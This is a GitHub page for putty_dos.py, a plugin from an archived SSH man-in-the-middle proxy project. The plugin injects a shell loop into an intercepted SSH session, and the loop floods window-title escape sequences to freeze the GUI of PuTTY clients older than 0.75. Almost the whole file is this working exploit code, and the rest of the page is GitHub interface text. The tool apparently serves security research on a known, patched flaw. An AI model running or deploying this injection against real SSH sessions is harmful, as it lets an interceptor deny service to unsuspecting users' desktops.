This repository has been archived by the owner on Feb 11, 2022. It is now read-only.
Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
ssh-mitm-plugins/ssh_mitm_plugins/ssh/putty_dos.py /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
27 lines (21 sloc)
829 Bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from ssh_proxy_server.forwarders.ssh import SSHForwarder | |
| class SSHPuttyDoSForwarder(SSHForwarder): | |
| """PuTTY < 0.75: DoS on Windows/Linux clients | |
| Security fix: a server could DoS the whole Windows/Linux GUI by telling | |
| the PuTTY window to change its title repeatedly at high speed. | |
| PuTTY-Changelog: https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html | |
| """ | |
| def __init__(self, session): | |
| super().__init__(session) | |
| self.exploit = [ | |
| "PS1=''", | |
| "while :", | |
| "do", | |
| "echo -ne '\\033]0: NEW_TITLE${RANDOM} \\007'", | |
| "done" | |
| ] | |
| self.executed = False | |
| def forward_extra(self): | |
| if not self.executed: | |
| self.server_channel.sendall('\n'.join(self.exploit) + '\n') | |
| self.executed = True |